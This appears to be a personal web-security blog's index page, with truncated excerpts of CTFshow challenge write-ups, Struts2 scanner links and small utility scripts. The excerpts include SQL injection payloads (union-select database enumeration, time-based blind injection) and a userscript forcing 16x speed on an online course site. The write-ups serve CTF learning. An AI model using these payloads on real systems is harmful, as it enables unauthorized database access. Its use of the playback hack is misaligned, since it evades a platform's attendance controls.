██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ██▀███ ▐██▌ ▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▓██ ▒ ██▒ ▐██▌ ▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ▓██ ░▄█ ▒ ▐██▌ ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ▒██▀▀█▄ ▓██▒ ░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░██▓ ▒██▒ ▒▄▄ ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░░ ▒▓ ░▒▓░ ░▀▀▒ ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░▒ ░ ▒░ ░ ░ ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ ░
./artifact
installing...
Done!
sudo su
whoami
Hacker
https://blog.csdn.net/q20010619/article/details/120729447 这里面的漏洞都是struts2漏洞,使用 建议下载Struts2scan工具辅助学习。 https://github.com/HatBoy/Struts2-Scan.git https://github.com/shack2/Struts2VulsTools * 通过页面回显的错误消息来判断,页面不回显错误消息时则无效 * 通过网页后缀来判断,如.do .action,有可能不准 * 如果配置文件中常数extension的值以逗号结尾或者有空值,指明了action可以不
web254 和反序列化没啥关系,可能只是来了解一下代码: error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->isVip; } public function login($u,$p){ if($t
web214 时间盲注 终于知道是哪来的注入点了,在主页的网络包中有一个select.js中能看到: $.ajax({ url:'api/', dataType:"json", type:'post', data:{ ip:returnCitySN["cip"], debug:0 } }); 向其中可以存在注入点。 hackbar测试一下: 有sql执行,继续构建测试payload: ip=if(substr(database(),1,1)=('c'),sleep(5),1)&debug=0 然后就是写脚本 先贴一下佬们的脚本: """ Au
如果你用了我之前发的脚本,你就会发现这个图片删后缀解析功能失效了。 不仅如此,以前用过生成的所有图片也失效了。 如果预览的话,会提示如下: 但是当多次访问之后就会提示下载,但是图片仍然不会解析。 本来以为用不了了,打算搞个接口自己刷新,但是教程太乱了,而且感觉应该还有绕过的办法。 经过多次调试发现,这里有一个referer验证。 没有referer的访问是会被403的。 因此这个问题就变成了如何让访问具有referer验证,或者说不让他验证。 在网上查了很久发现一段代码: <meta name="referrer" content="no-referrer" /> 用它来拒绝refer
web191 跟上题一样,由于换了一章,就重新叙述一下。 布尔盲注需要先找到一个可改变的注入点。 比如: * admin' and 0#时返回的是用户名不存在 * admin' and 1#返回的是密码错误 由此编写脚本:这题还是用是190的脚本即可 直接使用paayload: # -*- encoding: utf-8 -*- """ @File : SQL布尔盲注2.py @Contact : 2997453446@qq.com @Blog : natro92.github.io @Modify Time @Author @Ver
web171 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; 三栏一眼丁真,直接内容拼入即可。 -1' union select 1,2,database() --+ 查询库名: -1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+ information_schema,test,mysql,performan
用了语雀的md编辑器,感觉typora有点用不惯,但是语雀的到处图片会有限制,虽然能够浏览,但是使用hexo之后就不行了,寻找了几个方法,最好用的就是修改图片格式,将地址后的参数删除掉。 一个一个改太费劲了,因此写了一个简单的python脚本来代替机械劳动。 # -*- encoding: utf-8 -*- """ @File : YuQueShareLink.py @Contact : 2997453446@qq.com @Blog : natro92.github.io @Modify Time @Author @Version @Descip
前言:BYD智慧树嘎嘎刷视频,1.5倍速太浪费时间了,通过查看前端代码发现了一种逃课方法。可以通过修改播放器的倍速播放功能来实现加速播放效果。 // ==UserScript== // @name 智慧树16倍速自动脚本 // @namespace http://natro92.github.io // @version 0.1 // @description 自动修改脚本倍速x1.5->x16 // @author natro92 // @match *://*.zhihuishu.com/* // @icon h
web151、web152 前端校验 根据提示,检验写在了前端。 layui.use('upload', function(){ var upload = layui.upload; //执行实例 var uploadInst = upload.render({ elem: '#upload' //绑定元素 ,url: '/upload/' //上传接口 ,done: function(res){ if(res.code==0){ $("#result").html("文件上传成功,路径:"+res.msg); }e
web106 highlight_file(__FILE__); include("flag.php"); if(isset($_POST['v1']) && isset($_GET['v2'])){ $v1 = $_POST['v1']; $v2 = $_GET['v2']; if(sha1($v1)==sha1($v2) && $v1!=$v2){ echo $flag; } } 数组和转为0e都行,这里图省事使用了数组绕过。 web107 parse_str highlight_file(__FILE__); error_reporting(0); inc
Interested in simultaneously learning front-end and back-end development as well as WEB security.
Carpe diem.